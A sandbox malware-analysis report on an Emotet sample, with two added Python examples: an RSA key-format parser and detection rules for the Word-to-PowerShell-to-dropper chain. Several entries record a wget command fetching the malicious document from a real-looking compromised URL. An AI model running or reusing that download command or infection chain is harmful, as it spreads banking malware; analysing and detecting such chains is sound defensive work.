  • Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.dr | String found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
  • Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.dr | String found in binary or memory: https://store.office.cn/addinstemplate
  • Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.dr | String found in binary or memory: https://store.office.com/?productgroup=Outlook
  • Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.dr | String found in binary or memory: https://store.office.com/addinstemplate
  • Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.dr | String found in binary or memory: https://store.office.de/addinstemplate
  • Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.dr | String found in binary or memory: https://store.officeppe.com/addinstemplate
  • Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.dr | String found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
  • Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.dr | String found in binary or memory: https://tasks.office.com
  • Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.dr | String found in binary or memory: https://templatelogging.office.com/client/log
  • Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.dr | String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
  • Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.dr | String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
  • Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.dr | String found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
  • Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.dr | String found in binary or memory: https://web.microsoftstream.com/video/
  • Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.dr | String found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
  • Source: wget.exe, 00000002.00000002.4302724913.0000000001060000.00000004.00000040.sdmp, cmdline.out.2.dr | String found in binary or memory: https://wentworthfallspots.com.au/wp-admin/balance/umn13rj63723324176254991zxuou9yb4im7n3520k
  • Source: cmdline.out.2.dr | String found in binary or memory: https://wentworthfallspots.com.au/wp-admin/balance/umn13rj63723324176254991zxuou9yb4im7n3520k/
  • Source: wget.exe, 00000002.00000003.4301283368.0000000000F84000.00000004.00000001.sdmp | String found in binary or memory: https://wentworthfallspots.com.au/wp-admin/balance/umn13rj63723324176254991zxuou9yb4im7n3520k/g
  • Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.dr | String found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.drString found in binary or memory: https://wus2-000.contentsync.
Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.drString found in binary or memory: https://wus2-000.pagecontentsync.
Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
Source: 973F663E-EBDE-4CD4-9945-D3DEF5F0583F.5.drString found in binary or memory: https://www.odwebp.svc.ms
Uses HTTPS
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49881
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49869
Source: unknown | Network traffic detected: HTTP traffic on port 49881 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49869 -> 443

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Potential key logger detected (key state polling based)
Source: C:\Users\user\546.exe | Code function: 11_2_0043A3BA GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA
Source: C:\Users\user\546.exe | Code function: 11_2_0044C952 ScreenToClient,GetKeyState,GetKeyState,GetKeyState,KillTimer,IsWindow
Source: C:\Users\user\546.exe | Code function: 11_2_0043EDC2 GetKeyState,GetKeyState,GetKeyState,GetKeyState
Source: C:\Users\user\546.exe | Code function: 11_2_00451462 GetKeyState,GetKeyState,GetKeyState,GetFocus,GetDesktopWindow,SendMessageA,SendMessageA,GetParent
Source: C:\Users\user\546.exe | Code function: 12_2_0043A3BA GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA
Source: C:\Users\user\546.exe | Code function: 12_2_0044C952 ScreenToClient,GetKeyState,GetKeyState,GetKeyState,KillTimer,IsWindow
Source: C:\Users\user\546.exe | Code function: 12_2_0043EDC2 GetKeyState,GetKeyState,GetKeyState,GetKeyState
Source: C:\Users\user\546.exe | Code function: 12_2_00451462 GetKeyState,GetKeyState,GetKeyState,GetFocus,GetDesktopWindow,SendMessageA,SendMessageA,GetParent
Source: C:\Users\user\546.exe | Code function: 12_2_00453D18 GetKeyState,GetKeyState,GetKeyState
Source: C:\Users\user\546.exe | Code function: 12_2_00433F06 __EH_prolog,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetParent,SendMessageA,ScreenToClient,GetCursorPos,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SetWindowPos,SendMessageA,SendMessageA,GetParent

E-Banking Fraud:

Detected Emotet e-Banking trojan
Source: C:\Windows\SysWOW64\driverthunk.exe | Code function: 14_2_00F8CCBC
Malicious encrypted Powershell command line found
Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PoWERsheLL -e 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
Yara detected Emotet
Source: Yara match | File source: 0000000C.00000002.4443946272.0000000002290000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.4392825244.00000000020E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.4734087079.0000000000F81000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.4734046172.0000000000F60000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.4436765350.0000000000E00000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.4436809034.0000000000E21000.00000020.00000001.sdmp, type: MEMORY

Spam, unwanted Advertisements and Ransom Demands:

Contains functionality to import cryptographic keys (often used in ransomware)
Source: C:\Windows\SysWOW64\driverthunk.exe | Code function: 14_2_00F81F75 CryptAcquireContextW,CryptDecodeObjectEx,CryptImportKey,LocalFree,CryptReleaseContext
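CryptDecodeObjectEx followed by CryptImportKey is the CryptoAPI route from an encoded (DER) public key to a usable key handle, and a sample that carries its own public key this way can be fingerprinted on that key. The report does not say which structure this function decodes; the common pairing, assumed here, is CryptDecodeObjectEx with RSA_CSP_PUBLICKEYBLOB over a PKCS#1 RSAPublicKey, whose output CryptImportKey accepts as-is. The Python below is an added example, not the sample's code and not part of the Joe Sandbox report: it builds a DER RSAPublicKey from a constructed modulus and exponent, parses it back with a minimal DER reader, and lays it out as the PUBLICKEYBLOB (BLOBHEADER, RSAPUBKEY, little-endian modulus) that the Windows call produces, so a key pulled from a memory dump can be checked in either form without a Windows box.

```python
import struct

# Constructed 1024-bit modulus for the example (a recognisable pattern, not a
# real key); any RSA public key would do.
SAMPLE_N = int("CAFEBABE" + "DEADBEEF" * 31, 16)
SAMPLE_E = 65537


def _der_len(n: int) -> bytes:
    """DER length: short form below 0x80, else 0x80|count then big-endian bytes."""
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body


def der_integer(value: int) -> bytes:
    body = value.to_bytes(max(1, (value.bit_length() + 7) // 8), "big")
    if body[0] & 0x80:          # DER INTEGER is signed: keep the value positive
        body = b"\x00" + body
    return b"\x02" + _der_len(len(body)) + body


def der_rsa_public_key(n: int, e: int) -> bytes:
    """PKCS#1 RSAPublicKey ::= SEQUENCE { modulus INTEGER, publicExponent INTEGER }"""
    inner = der_integer(n) + der_integer(e)
    return b"\x30" + _der_len(len(inner)) + inner


def _read_tlv(buf: bytes, pos: int):
    """Read one tag-length-value at pos; return (tag, value, position after it)."""
    tag, length = buf[pos], buf[pos + 1]
    pos += 2
    if length & 0x80:
        count = length & 0x7F
        length = int.from_bytes(buf[pos:pos + count], "big")
        pos += count
    return tag, buf[pos:pos + length], pos + length


def parse_rsa_public_key(der: bytes):
    tag, seq, end = _read_tlv(der, 0)
    if tag != 0x30 or end != len(der):
        raise ValueError("not a single DER SEQUENCE")
    tag_n, n_bytes, pos = _read_tlv(seq, 0)
    tag_e, e_bytes, pos = _read_tlv(seq, pos)
    if tag_n != 0x02 or tag_e != 0x02 or pos != len(seq):
        raise ValueError("expected exactly two INTEGERs")
    return int.from_bytes(n_bytes, "big"), int.from_bytes(e_bytes, "big")


def to_publickeyblob(n: int, e: int) -> bytes:
    """CryptoAPI PUBLICKEYBLOB: BLOBHEADER{bType=PUBLICKEYBLOB(6), bVersion=2,
    reserved, aiKeyAlg=CALG_RSA_KEYX(0xA400)} + RSAPUBKEY{'RSA1', bitlen, pubexp}
    + the modulus in little-endian byte order."""
    bitlen = ((n.bit_length() + 7) // 8) * 8
    header = struct.pack("<BBHI", 0x06, 0x02, 0, 0x0000A400)
    rsapubkey = struct.pack("<4sII", b"RSA1", bitlen, e)
    return header + rsapubkey + n.to_bytes(bitlen // 8, "little")


def parse_publickeyblob(blob: bytes):
    btype, _ver, _res, alg = struct.unpack_from("<BBHI", blob, 0)
    magic, bitlen, e = struct.unpack_from("<4sII", blob, 8)
    if btype != 0x06 or alg != 0x0000A400 or magic != b"RSA1":
        raise ValueError("not an RSA PUBLICKEYBLOB")
    n = int.from_bytes(blob[20:20 + bitlen // 8], "little")
    return n, e


if __name__ == "__main__":
    der = der_rsa_public_key(SAMPLE_N, SAMPLE_E)
    blob = to_publickeyblob(*parse_rsa_public_key(der))
    print(f"DER {len(der)} bytes, PUBLICKEYBLOB {len(blob)} bytes, e={parse_publickeyblob(blob)[1]}")
```

Pointing parse_rsa_public_key at bytes carved from one of the matched memory regions, or parse_publickeyblob at the buffer CryptImportKey receives, gives the modulus directly; a modulus shared across samples is a stronger cluster key than file hashes, which change per build.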

System Summary:

Malicious sample detected (through community Yara rule)
Source: 0000000C.00000002.4443946272.0000000002290000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Emotet Payload Author: kevoreilly
Source: 0000000B.00000002.4392825244.00000000020E0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Emotet Payload Author: kevoreilly
Source: 0000000E.00000002.4734087079.0000000000F81000.00000020.00000001.sdmp, type: MEMORY | Matched rule: Emotet Payload Author: kevoreilly
Source: 0000000B.00000002.4392999484.0000000002101000.00000020.00000001.sdmp, type: MEMORY | Matched rule: Emotet Payload Author: kevoreilly
Source: 0000000E.00000002.4734046172.0000000000F60000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Emotet Payload Author: kevoreilly
Source: 0000000C.00000002.4444003795.00000000022B1000.00000020.00000001.sdmp, type: MEMORY | Matched rule: Emotet Payload Author: kevoreilly
Source: 0000000D.00000002.4436765350.0000000000E00000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Emotet Payload Author: kevoreilly
Source: 0000000D.00000002.4436809034.0000000000E21000.00000020.00000001.sdmp, type: MEMORY | Matched rule: Emotet Payload Author: kevoreilly
Powershell drops PE file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\546.exe
Very long command line found
Source: unknown | Process created: Commandline size = 2181
Contains functionality to delete services
Source: C:\Windows\SysWOW64\driverthunk.exe | Code function: 14_2_00F8CE88 GetModuleFileNameW,lstrlenW,OpenServiceW,DeleteService,CloseServiceHandle
Contains functionality to launch a process as a different user
Source: C:\Windows\SysWOW64\driverthunk.exe | Code function: 14_2_00F81D2B CreateProcessAsUserW,CreateProcessW
Creates files inside the system directory
Source: C:\Windows\SysWOW64\driverthunk.exe | File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache
Detected potential crypto function
Source: C:\Users\user\546.exe | Code function: 11_2_0041AAF2
Source: C:\Users\user\546.exe | Code function: 12_2_0041AAF2
Source: C:\Users\user\546.exe | Code function: 12_2_0041F7B4
Source: C:\Users\user\546.exe | Code function: 12_2_00425835
Source: C:\Users\user\546.exe | Code function: 12_2_0043BA2E
Source: C:\Users\user\546.exe | Code function: 12_2_0042DC9F
Source: C:\Windows\SysWOW64\driverthunk.exe | Code function: 13_2_00E030E4
Source: C:\Windows\SysWOW64\driverthunk.exe | Code function: 13_2_00E030E8
Source: C:\Windows\SysWOW64\driverthunk.exe | Code function: 13_2_00E028C1
Source: C:\Windows\SysWOW64\driverthunk.exe | Code function: 13_2_00E237A5
Source: C:\Windows\SysWOW64\driverthunk.exe | Code function: 13_2_00E237A9
Source: C:\Windows\SysWOW64\driverthunk.exe | Code function: 13_2_00E22F82
Source: C:\Windows\SysWOW64\driverthunk.exe | Code function: 14_2_00F630E4
Source: C:\Windows\SysWOW64\driverthunk.exe | Code function: 14_2_00F630E8
Source: C:\Windows\SysWOW64\driverthunk.exe | Code function: 14_2_00F628C1
Source: C:\Windows\SysWOW64\driverthunk.exe | Code function: 14_2_00F837A9
Source: C:\Windows\SysWOW64\driverthunk.exe | Code function: 14_2_00F837A5
Source: C:\Windows\SysWOW64\driverthunk.exe | Code function: 14_2_00F82F82
Document contains an embedded VBA macro which executes code when the document is opened / closed
Source: O_45870184.rtf.2.dr | OLE, VBA macro line: Private Sub Document_open()
Found potential string decryption / allocating functions
Source: C:\Users\user\546.exe | Code function: String function: 004204C4 appears 121 times
Source: C:\Users\user\546.exe | Code function: String function: 00402320 appears 43 times
Source: C:\Users\user\546.exe | Code function: String function: 0043D095 appears 71 times
Source: C:\Users\user\546.exe | Code function: String function: 0041FBF8 appears 554 times
Source: C:\Users\user\546.exe | Code function: String function: 00401330 appears 40 times
Source: C:\Users\user\546.exe | Code function: String function: 00425076 appears 53 times
Source: C:\Users\user\546.exe | Code function: String function: 00439D44 appears 77 times
Source: C:\Users\user\546.exe | Code function: String function: 00422CD7 appears 76 times
Source: C:\Users\user\546.exe | Code function: String function: 0045634D appears 39 times
Source: C:\Users\user\546.exe | Code function: String function: 004550E6 appears 81 times
Source: C:\Users\user\546.exe | Code function: String function: 0043CF2E appears 79 times
PE file contains strange resources
Source: 546.exe.6.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 546.exe.6.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 546.exe.6.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Yara signature match
Source: 0000000C.00000002.4443946272.0000000002290000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
Source: 0000000B.00000002.4392825244.00000000020E0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
Source: 0000000E.00000002.4734087079.0000000000F81000.00000020.00000001.sdmp, type: MEMORY | Matched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
Source: 0000000B.00000002.4392999484.0000000002101000.00000020.00000001.sdmp, type: MEMORY | Matched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
Source: 0000000E.00000002.4734046172.0000000000F60000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
Source: 0000000C.00000002.4444003795.00000000022B1000.00000020.00000001.sdmp, type: MEMORY | Matched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
Source: 0000000D.00000002.4436765350.0000000000E00000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
Source: 0000000D.00000002.4436809034.0000000000E21000.00000020.00000001.sdmp, type: MEMORY | Matched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
Source: C:\Users\user\Documents\20200204\PowerShell_transcript.376483.QmD+FPdS.20200204190611.txt, type: DROPPED | Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Classification label
Source: classification engine | Classification label: mal100.bank.troj.evad.win@13/22@3/5
Contains functionality to check free disk space
Source: C:\Users\user\546.exe | Code function: 11_2_00446D7C __EH_prolog,GetDiskFreeSpaceA,GetFullPathNameA,GetTempFileNameA,GetFileTime,SetFileTime,GetFileSecurityA,GetFileSecurityA,GetFileSecurityA,SetFileSecurityA
Contains functionality to create services
Source: C:\Windows\SysWOW64\driverthunk.exe | Code function: 14_2_00F8CF58 OpenSCManagerW,_snwprintf,CreateServiceW,OpenServiceW,ChangeServiceConfig2W,StartServiceW,CloseServiceHandle,CloseServiceHandle
Contains functionality to enum processes or threads
Source: C:\Windows\SysWOW64\driverthunk.exe | Code function: 13_2_00E21943 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle
Contains functionality to instantiate COM classes
Source: C:\Users\user\546.exe | Code function: 11_2_0045E063 CoCreateInstance,CoCreateInstance,CoCreateInstance,OleRun
Contains functionality to load and extract PE file embedded resources
Source: C:\Users\user\546.exe | Code function: 11_2_0043E6C6 __EH_prolog,FindResourceA,LoadResource,LockResource,GetDesktopWindow,IsWindowEnabled,EnableWindow,EnableWindow,GetActiveWindow,SetActiveWindow,FreeResource
Contains functionality to modify services (start/stop/modify)
Source: C:\Windows\SysWOW64\driverthunk.exe | Code function: 14_2_00F8CF58 OpenSCManagerW,_snwprintf,CreateServiceW,OpenServiceW,ChangeServiceConfig2W,StartServiceW,CloseServiceHandle,CloseServiceHandle
Creates files inside the user directory
Source: C:\Windows\SysWOW64\cmd.exe | File created: C:\Users\user\Desktop\cmdline.out
Creates mutexes
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5672:120:WilError_01
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6104:120:WilError_01
Source: C:\Users\user\546.exe | Mutant created: \Sessions\1\BaseNamedObjects\Global\MAEB3A448
Source: C:\Users\user\546.exe | Mutant created: \Sessions\1\BaseNamedObjects\Global\IAEB3A448
Source: C:\Windows\SysWOW64\driverthunk.exe | Mutant created: \BaseNamedObjects\Global\IAEB3A448
Creates temporary files
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE | File created: C:\Users\user\AppData\Local\Temp\{E566382D-E9C7-4F1B-AA33-A7B4D991C2B8} - OProcSessId.dat
Parts of this application use the .NET runtime (probably coded in C#)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\b818384f6f636b55ba6f5af0c6a7784d\mscorlib.ni.dll
Queries process information (via WMI, Win32_Process)
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Reads ini files
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE | File read: C:\Users\desktop.ini
Reads software policies
Source: C:\Windows\SysWOW64\wget.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Reads the hosts file
Source: C:\Windows\SysWOW64\wget.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File read: C:\Windows\System32\drivers\etc\hosts
Sample requires command line parameters (based on API chain)
Source: C:\Windows\SysWOW64\driverthunk.exe | Evasive API call chain: GetCommandLine,DecisionNodes,ExitProcess
Spawns processes
Source: unknown | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c wget -t 2 -v -T 60 -P 'C:\Users\user\Desktop\download' --no-check-certificate --content-disposition --user-agent='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko' 'https://wentworthfallspots.com.au/wp-admin/balance/umn13rj63723324176254991zxuou9yb4im7n3520k' > cmdline.out 2>&1
Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\SysWOW64\wget.exe wget -t 2 -v -T 60 -P 'C:\Users\user\Desktop\download' --no-check-certificate --content-disposition --user-agent='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko' 'https://wentworthfallspots.com.au/wp-admin/balance/umn13rj63723324176254991zxuou9yb4im7n3520k'
Source: unknown | Process created: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE 'C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE' /n 'C:\Users\user\Desktop\download\O_45870184.rtf.docm' /o ''
Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PoWERsheLL -e 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
Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Users\user\546.exe C:\Users\user\546.exe
Source: unknown | Process created: C:\Users\user\546.exe --b0e232c2
Source: unknown | Process created: C:\Windows\SysWOW64\driverthunk.exe C:\Windows\SysWOW64\driverthunk.exe
Source: unknown | Process created: C:\Windows\SysWOW64\driverthunk.exe --4d57fc0c
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\wget.exe wget -t 2 -v -T 60 -P 'C:\Users\user\Desktop\download' --no-check-certificate --content-disposition --user-agent='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko' 'https://wentworthfallspots.com.au/wp-admin/balance/umn13rj63723324176254991zxuou9yb4im7n3520k'
Source: C:\Users\user\546.exe | Process created: C:\Users\user\546.exe --b0e232c2
Source: C:\Windows\SysWOW64\driverthunk.exe | Process created: C:\Windows\SysWOW64\driverthunk.exe --4d57fc0c
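The chain above (Word spawning PowerShell with an encoded command, PowerShell writing 546.exe into the profile root, 546.exe relaunching itself with an eight-hex-digit argument, then a copy started from SysWOW64 under a new name) is what a detection should key on; the file names and the hex arguments change per build. The Python below is an added example, not part of the Joe Sandbox report: it replays constructed Sysmon-style process and file events shaped after this chain (the base64 argument is a placeholder, not the page's command line) and applies four rules to them, with a benign PowerShell launch and a Windows-service write into SysWOW64 included to show what must not fire.

```python
import re
from dataclasses import dataclass
from typing import List, Tuple


@dataclass
class Event:
    kind: str          # "process" (creation) or "file" (write)
    image: str         # acting process
    parent: str = ""   # parent image, process events only
    cmdline: str = ""  # command line, process events only
    target: str = ""   # file written, file events only


POWERSHELL = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
WINWORD = r"C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE"

# Constructed events shaped after the chain in this report. The base64 is a
# placeholder, not the page's command line.
EVENTS = [
    Event("process", POWERSHELL, parent=WINWORD,
          cmdline="PoWERsheLL -e QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUE="),
    Event("file", POWERSHELL, target=r"C:\Users\user\546.exe"),
    Event("process", r"C:\Users\user\546.exe", parent=POWERSHELL,
          cmdline=r"C:\Users\user\546.exe"),
    Event("process", r"C:\Users\user\546.exe", parent=r"C:\Users\user\546.exe",
          cmdline="--b0e232c2"),
    Event("file", r"C:\Users\user\546.exe", target=r"C:\Windows\SysWOW64\driverthunk.exe"),
    Event("process", r"C:\Windows\SysWOW64\driverthunk.exe", parent=r"C:\Users\user\546.exe",
          cmdline=r"C:\Windows\SysWOW64\driverthunk.exe"),
    # Benign noise that must stay quiet.
    Event("process", POWERSHELL, parent=r"C:\Windows\explorer.exe",
          cmdline="powershell -File C:\\scripts\\backup.ps1"),
    Event("file", r"C:\Windows\System32\svchost.exe", target=r"C:\Windows\SysWOW64\driverthunk.exe"),
]

OFFICE = re.compile(r"\\(winword|excel|powerpnt|outlook)\.exe$", re.I)
ENCODED_ARG = re.compile(r"(^|\s)-(e|ec|en|enc|encodedcommand)\s+[A-Za-z0-9+/=]{16,}", re.I)
PROFILE_ROOT_PE = re.compile(r"^[A-Z]:\\Users\\[^\\]+\\[^\\]+\.exe$", re.I)
HEX_ARG = re.compile(r"^--[0-9a-f]{8}$", re.I)
SYSTEM_DIR_PE = re.compile(r"^[A-Z]:\\Windows\\(System32|SysWOW64)\\[^\\]+\.exe$", re.I)
WINDOWS_DIR = re.compile(r"^[A-Z]:\\Windows\\", re.I)


def detect(events: List[Event]) -> List[Tuple[str, str]]:
    """Return (rule, image) pairs in the order the events fire them."""
    hits = []
    user_written_system_pes = set()   # system-dir PEs written by non-Windows images
    for ev in events:
        if ev.kind == "process":
            if (OFFICE.search(ev.parent) and "powershell" in ev.image.lower()
                    and ENCODED_ARG.search(ev.cmdline)):
                hits.append(("office_spawned_encoded_powershell", ev.image))
            if (PROFILE_ROOT_PE.match(ev.image) and ev.image.lower() == ev.parent.lower()
                    and HEX_ARG.match(ev.cmdline)):
                hits.append(("profile_root_pe_relaunches_itself_with_hex_arg", ev.image))
            if ev.image.lower() in user_written_system_pes:
                hits.append(("user_written_system_dir_pe_started", ev.image))
        else:
            if "powershell" in ev.image.lower() and PROFILE_ROOT_PE.match(ev.target):
                hits.append(("powershell_wrote_pe_to_profile_root", ev.image))
            if SYSTEM_DIR_PE.match(ev.target) and not WINDOWS_DIR.match(ev.image):
                user_written_system_pes.add(ev.target.lower())
    return hits


if __name__ == "__main__":
    for rule, image in detect(EVENTS):
        print(f"{rule}: {image}")
```

The last rule is stateful on purpose: a write into SysWOW64 by a non-Windows image is only recorded, and the alert fires when that path is later executed, which is the "PE file moved" then "Executable created and started" pair recorded under Persistence and Installation Behavior below.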
Uses an in-process (OLE) Automation server
Source: C:\Users\user\546.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
Executable creates window controls seldom found in malware
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE | Window found: window name: SysTabControl32
Found graphical window changes (likely an installer)
Source: Window Recorder | Window detected: More than 3 window changes detected
Uses Microsoft Silverlight
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Checks if Microsoft Office is installed
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office
Uses new MSVCR Dlls
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE | File opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dll
Binary contains paths to debug symbols
Source: Binary string: c:\Users\User\Desktop\2003\4.2.20\ObjectInspector_demo\Release\ObjectInspectorTest.pdb4 | source: 546.exe, 0000000B.00000000.4365989600.0000000000463000.00000002.00020000.sdmp, 546.exe, 0000000C.00000002.4442391514.0000000000463000.00000002.00020000.sdmp, driverthunk.exe, 0000000D.00000002.4435633333.0000000000463000.00000002.00020000.sdmp, driverthunk.exe, 0000000E.00000002.4732707492.0000000000463000.00000002.00020000.sdmp, 546.exe.6.dr
Source: Binary string: c:\Users\User\Desktop\2003\4.2.20\ObjectInspector_demo\Release\ObjectInspectorTest.pdb | source: 546.exe, 0000000B.00000000.4365989600.0000000000463000.00000002.00020000.sdmp, 546.exe, 0000000C.00000002.4442391514.0000000000463000.00000002.00020000.sdmp, driverthunk.exe, 0000000D.00000002.4435633333.0000000000463000.00000002.00020000.sdmp, driverthunk.exe, 0000000E.00000002.4732707492.0000000000463000.00000002.00020000.sdmp, 546.exe.6.dr

Data Obfuscation:

PowerShell case anomaly found
